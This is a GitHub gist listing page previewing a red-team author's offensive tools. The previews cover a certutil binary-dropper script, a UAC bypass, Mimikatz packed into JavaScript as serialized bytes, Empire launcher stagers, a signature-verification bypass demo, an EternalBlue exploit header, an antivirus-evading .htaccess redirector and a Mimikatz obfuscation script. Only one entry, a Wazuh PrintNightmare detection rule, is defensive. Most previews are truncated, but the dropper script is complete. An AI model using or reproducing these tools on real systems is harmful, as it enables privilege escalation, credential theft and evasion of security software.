infosecn1nja
/ drop_binary.sh
Created
July 16, 2017 00:11
Drop binary executable using certutil on windows
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # drop_binary.sh | |
| # ./drop_binary.sh /usr/share/windows-binaries/nc.exe nc.txt | |
| # certutil -decode encoded.txt decoded.bin | |
| echo "-----BEGIN CERTIFICATE-----" > $2 | |
| cat $1 | base64 >> $2 | |
| echo "-----END CERTIFICATE-----" >> $2 | |
| sed -i 's/^/echo /g' $2 && sed -i 's/$/ >> encoded.txt/g' $2 |
infosecn1nja
/ EventVwrBypass.cs
Created
July 22, 2017 01:04
— forked from leoloobeek/EventVwrBypass.cs
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Linq; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.Win32; | |
| /* | |
| InstallUtil.exe C# version of Event Viewer UAC bypass |
infosecn1nja
/ katz.js
Created
July 22, 2017 01:05
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var serialized_obj = [ | |
| 0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
| 101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
| 101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
| 68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
| 103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
| 122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
| 101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, | |
| 0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101, |
infosecn1nja
/ starfighter_vbs.py
Created
July 24, 2017 09:01
Empire stagers module to generates a .vbs launcher.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from lib.common import helpers | |
| class Stager: | |
| def __init__(self, mainMenu, params=[]): | |
| self.info = { | |
| 'Name': 'VBS Launcher StarFighter', | |
| 'Author': ['Cn33liz'], |
infosecn1nja
/ SignatureVerificationAttack.ps1
Created
March 10, 2018 10:03
— forked from mattifestation/SignatureVerificationAttack.ps1
Demos from my DerbyCon keynote
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Host.Runspace.LanguageMode | |
| Get-AuthenticodeSignature -FilePath C:\Demo\bypass_test.psm1 | |
| Get-AuthenticodeSignature -FilePath C:\Demo\notepad_backdoored.exe | |
| # Try to execute the script. Add-Type will fail. | |
| Import-Module C:\Demo\bypass_test.psm1 | |
| $VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' + | |
| '\OID\EncodingType 0\CryptSIPDllVerifyIndirectData' |
infosecn1nja
/ starfighter_js.py
Created
July 21, 2017 23:45
Empire stagers module to generates a .js launcher.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from lib.common import helpers | |
| class Stager: | |
| def __init__(self, mainMenu, params=[]): | |
| self.info = { | |
| 'Name': 'JS Launcher StarFighter', | |
| 'Author': ['Cn33liz'], |
infosecn1nja
/ eternalblue7_exploit.py
Created
July 22, 2017 01:04
— forked from worawit/eternalblue7_exploit.py
Eternalblue exploit for Windows 7/2008
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
| from impacket import smb | |
| from struct import pack | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 7/2008 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
infosecn1nja
/ .htaccess
Created
June 9, 2018 09:51
— forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RewriteEngine On | |
| # Uncomment the below line for verbose logging, including seeing which rule matched. | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device | |
| RewriteCond expr "-R '54.0.0.0/8'" [OR] | |
| RewriteCond expr "-R '52.0.0.0/8'" [OR] |
infosecn1nja
/ obfuscate-mimikatz.sh
Created
January 28, 2018 08:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [[ $# -le 1 ]] ; then | |
| echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1' | |
| exit 1 | |
| fi | |
| randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};} | |
| cp $1 $2 |
infosecn1nja
/ printernightmare_cve_2021_34527.xml
Last active
July 6, 2021 05:39
Wazuh Rules: PrinterNightmare CVE-2021-34527 Exploit Detection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| - PrinterNightmare CVE-2021-34527 Exploit Detection | |
| - Created by Rahmat Nurfauzi (@infosecn1nja). | |
| - This program is a free software; you can redistribute it and/or modify it under the terms of GPLv2. | |
| --> | |
| <group name="sysmon,"> | |
| <rule id="99948" level="15"> | |
| <if_group>sysmon_event_11</if_group> | |
| <field name="win.eventdata.Image">\\\\spoolsv.exe$</field> | |
| <field name="win.eventdata.TargetFilename">\\\\New\\\\unidrv.dll$</field> |
OlderNewer